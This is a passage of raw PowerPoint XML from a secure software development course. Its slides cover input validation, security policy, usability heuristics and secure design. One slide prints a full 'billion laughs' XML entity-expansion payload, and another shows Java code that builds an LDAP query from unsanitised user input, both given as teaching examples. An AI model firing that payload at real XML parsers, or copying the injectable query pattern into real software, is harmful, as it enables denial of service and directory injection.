        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Validation (Slide 3 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1046961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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XML Parsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE lolz [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol "lol"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol2 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol7 "&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol8 "&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     &lt;!ENTITY lol9 "&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Validation (Slide 4 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319000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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LDAP Query Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String ldapSearchQuery = "(cn ="+ $userName + ")"; 	System.out.println(ldapSearchQuery);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input Validation (Slide 5 of 5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3292905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8B34E9-4A4C-4422-A543-746B6DC7901E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB40CBEC-F05B-4BCB-A23B-5DAC7FAC7A91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Policy Enforcement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC910691-6B85-4926-AD7F-53B39ECE42B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An organization's security policies define such things as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How different types of assets should be protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who should be able to access specific assets or categories of assets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How access to those assets should be monitored and audited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you are developing custom applications for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>An organization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, you'll need to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that your software follows and enforces company policies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: Enforce password policies, password complexity, authentication requirements, automatic logout after a certain period of inactivity, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A specific platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mobile app store, cloud services, etc.), you’ll need to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meet certain security provisions in your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>May limit what users can do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>May limit capabilities you can provide in your software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1951052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6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design the User Interface for Clarity and Simplicity </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="2754742"/>
            <a:ext cx="8460152" cy="3487795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visibility of system status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Match between system and the real world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User control and freedom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consistency and standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Error prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recognition rather than recall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flexibility and efficiency of use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aesthetic and minimalist design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Help users recognize, diagnose, and recover from errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Help and documentation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B23DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="762000" y="1157280"/>
            <a:ext cx="7838155" cy="1394529"/>
            <a:chOff x="341924" y="1066799"/>
            <a:chExt cx="9448548" cy="1681042"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="341924" y="1066800"/>
              <a:ext cx="4572000" cy="1681041"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5218472" y="1066799"/>
              <a:ext cx="4572000" cy="1681041"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12466A02-BEB7-44E8-A2C6-75BDCC6F9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880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hand key door"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="26666" t="4694" r="17501" b="8445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="2275890"/>
            <a:ext cx="4225991" cy="435214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A6BECB2-FAF0-4225-97F7-FA2E8297BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Promote Secure User Behavior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6496D163-9416-43B1-9E0B-1E8BD994176B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Educate users to recognize and avoid risky scenarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate all user-provided input to ensure it contains no unacceptable characters, is within acceptable ranges and data length, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When users take an unusual or risky action, warn them in a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>way that would make them think twice and not easily be ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make user prompts, user interface controls, and error </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>messages as clear as possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure software settings </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to provide the most secure </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>configuration by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the software is deployed with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>default credentials, it forces users</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to immediately update to strong</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B23DBC0-73C4-4066-8E97-26C73CF01EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10D791CA-A998-427F-8DC9-20A12C2BA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175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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1302040"/>
            <a:ext cx="8116276" cy="5098760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stronger your design early on, the less code you will have to change later on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To build security into your design processes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be sure that you understand what you are trying to build. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the environment in which your software will run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the major modules in your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List all of the errors that might occur in various modules, and how you will deal with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resist adding features that are not driven by requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adhere to secure coding standards for the languages and environments you use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEI CERT Oracle Coding Standard for Java—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/java/Java+Coding+Guidelines</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
